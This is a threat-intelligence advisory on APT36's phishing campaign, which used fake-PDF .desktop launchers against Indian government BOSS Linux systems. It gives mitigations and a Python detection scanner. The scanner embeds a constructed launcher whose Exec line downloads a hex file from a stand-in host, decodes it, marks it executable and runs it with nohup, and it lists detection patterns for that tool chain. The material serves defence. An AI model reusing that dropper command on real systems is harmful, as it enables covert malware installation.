Transparent Tribe Targets Indian Govt With Weaponized Desktop Shortcuts via Phishing
Summary:
An ongoing cyber-espionage campaign targeting Indian government entities has been attributed to the Pakistan-based threat group APT36 (Transparent Tribe). The group uses flexible, well-crafted tactics, including spear-phishing emails that carry malicious .desktop shortcut files for initial access. These files are built for the Linux-based BOSS operating system, showing that the group can adapt its tooling to the victim's environment. The malicious .desktop file is disguised as a legitimate PDF document. When opened, it executes a series of hidden commands that download a hex-encoded file from a malicious domain and convert it into an executable binary. To stay unnoticed, the file then launches a decoy PDF in a web browser, so the victim believes they have merely opened a document. The malware achieves persistence through systemd and cron jobs, so it restarts automatically after reboots or process termination. The campaign relies on two newly registered domains, securestore[.]cv and modgovindia[.]space, which serve as C2 servers for payload delivery and data exfiltration. The malware uses low-level socket operations and DNS queries for C2 communication, indicating a relatively sophisticated C2 channel. This campaign underscores APT36's state-sponsored focus on the Indian government, military, and diplomatic institutions. The group's demonstrated ability to extend its attack vectors to Linux-based platforms shows the adaptability of its increasingly sophisticated operations. Although Indian government entities remain the primary focus, APT36 has extended operations to adjacent sectors (education, research, and civil society) and has conducted opportunistic targeting in other geographies, introducing a risk to partners and suppliers abroad.
Security Officer Comments:
This operation highlights a shift in APT36's methodology, moving beyond its historical focus on Windows to also exploit BOSS Linux, a system likely in use within Indian government entities. Diversifying the systems it targets makes the group more resilient, as it can tailor its attacks to the victim's specific operating environment. The combination of social engineering with the technical tradecraft shown in the .desktop file payload, which silently executes malicious code and establishes persistence, demonstrates a high level of operational maturity. The rapid registration of disposable infrastructure, such as the securestore[.]cv and modgovindia[.]space domains, also reflects an efficient and well-resourced threat actor. This campaign signals that nation-state groups, especially those operating under heightened geopolitical tension, are actively broadening the attack surface they target to include indigenous operating systems, opening a new security gap in these highly targeted operations. Organizations, especially those in government and critical infrastructure, should adjust their security posture to account for similar threats. Additionally, CloudSEK independently reported on this activity, highlighting the anti-debugging and anti-sandbox capabilities of the malware. A separate Hunt[.]io report from late July describes similar activity and notes the use of the Poseidon backdoor malware.
Suggested Corrections:
IOCs are available here.
To mitigate the ongoing APT36 campaign targeting Indian Government entities through weaponized .desktop files and associated malicious domains, the following measures are formally recommended:
- Email Security Enhancements
- Deploy advanced email security solutions capable of detecting spear-phishing emails that contain .desktop, .sh, .elf, and compressed archive attachments.
- Disable automatic execution of email attachments and apply sandbox-based detonation of suspicious files prior to delivery.
- Enable URL filtering to block connections to newly registered or malicious domains (e.g., securestore[.]cv, modgovindia[.]space).
- User Awareness and Training
- Conduct regular cybersecurity awareness training, with emphasis on phishing indicators and high-risk Linux-specific file types.
- Promote caution when handling unsolicited attachments, particularly .desktop files disguised as official documents, or unknown Google Drive links.
- Host and Operating System Hardening
- Restrict execution of files from world-writable directories, such as /tmp, using filesystem mount options (noexec, nodev).
- Disable execution of .desktop files from untrusted sources and enforce strict application authorization controls.
- Apply least privilege principles in BOSS Linux deployments, with stringent controls over the use of utilities, such as curl, xxd, chmod, and nohup.
- Endpoint and Network Monitoring
- Implement Linux-capable Endpoint Detection and Response (EDR) solutions to monitor for execution of unknown ELF payloads, lateral movement, and C2 beaconing activity.
- Monitor DNS and outbound traffic for attempted connections to suspicious or recently registered APT36-associated domains.
- Use network segmentation to contain any potential compromise and limit lateral movement within critical infrastructure.
- Threat Intelligence Integration
- Integrate CYFIRMA-provided Indicators of Compromise (IOCs) and YARA signatures into SIEM and IDS/IPS platforms to facilitate early detection.
- Conduct proactive threat hunting based on known APT36 tactics, techniques, and procedures (TTPs) mapped to MITRE ATT&CK (e.g., T1204, T1059, T1105).
- Patch and Vulnerability Management
- Ensure BOSS Linux systems and commonly leveraged software (e.g., curl, LibreOffice) are patched promptly to mitigate exploitation of known vulnerabilities.
- Behavior-Based Controls
- Deploy detection rules to identify suspicious command sequences (e.g., curl | xxd | chmod | nohup) executed through .desktop files or shell scripts.
- Block execution of binaries downloaded via scripts unless verified and digitally signed by the organization.
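As an added illustration of the behavior-based control above (this is example code written for this advisory, not CYFIRMA's or the original report's tooling), the following scanner parses a .desktop launcher and flags the traits the campaign description relies on: a launcher named or iconed as a PDF while being Type=Application, an inline shell in Exec, the curl / xxd / chmod / nohup chain, and executables staged under /tmp. The two .desktop samples embedded below are constructed for the test and use the reserved example.invalid domain, not the campaign's real infrastructure.

```python
import re
from configparser import ConfigParser, Error as ConfigError

# Constructed sample mirroring the pattern the advisory describes (not a real artifact):
# a launcher named like a PDF whose Exec line fetches a hex-encoded file, decodes it
# with xxd, marks it executable, backgrounds it with nohup and opens a decoy document.
SAMPLE_DESKTOP = """[Desktop Entry]
Type=Application
Name=Circular_2025.pdf
Icon=application-pdf
Terminal=false
Exec=bash -c "curl -s https://example.invalid/p.hex -o /tmp/p.hex; xxd -r -p /tmp/p.hex > /tmp/p; chmod +x /tmp/p; nohup /tmp/p & xdg-open https://example.invalid/decoy.pdf"
"""

# Constructed benign launcher for comparison.
BENIGN_DESKTOP = """[Desktop Entry]
Type=Application
Name=Text Editor
Exec=gedit %U
Icon=gedit
"""

# Utilities named in the advisory's download-decode-execute chain (T1105 / T1059).
CHAIN_TOOLS = ("curl", "wget", "xxd", "chmod", "nohup")

def analyze_desktop(text):
    """Return a list of human-readable findings for one .desktop file's contents."""
    cp = ConfigParser(interpolation=None, strict=False)  # %U etc. must not interpolate
    cp.optionxform = str  # .desktop keys are case-sensitive
    try:
        cp.read_string(text)
    except ConfigError:
        return ["unparseable .desktop content"]
    if not cp.has_section("Desktop Entry"):
        return ["missing [Desktop Entry] section"]
    entry = cp["Desktop Entry"]
    exec_line, name, icon = entry.get("Exec", ""), entry.get("Name", ""), entry.get("Icon", "")
    findings = []
    # An application launcher dressed up as a document.
    if entry.get("Type", "") == "Application" and (re.search(r"\.pdf\s*$", name, re.I) or "pdf" in icon.lower()):
        findings.append("document masquerade: Name/Icon suggest a PDF but Type=Application")
    if re.match(r"\s*(ba)?sh\s+-c\b", exec_line):
        findings.append("Exec invokes an inline shell (sh/bash -c)")
    tools = [t for t in CHAIN_TOOLS if re.search(rf"\b{t}\b", exec_line)]
    if len(tools) >= 3:
        findings.append("download-decode-execute chain: " + ", ".join(tools))
    if re.search(r"\bxxd\s+-r\b", exec_line):
        findings.append("hex-decoding of a fetched file (xxd -r)")
    if "chmod" in tools and re.search(r"/tmp/\S+", exec_line):
        findings.append("marks a file under /tmp executable")
    return findings
```

Run it over ~/.config/autostart, ~/Desktop and mail-attachment quarantine directories; any launcher with two or more findings is worth triage alongside the systemd and cron persistence checks the advisory recommends.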
https://thehackernews.com/2025/08/transparent-tribe-targets-indian-govt.html
https://www.cyfirma.com/research/apt36-targets-indian-boss-linux-systems-with-weaponized-autostart-files/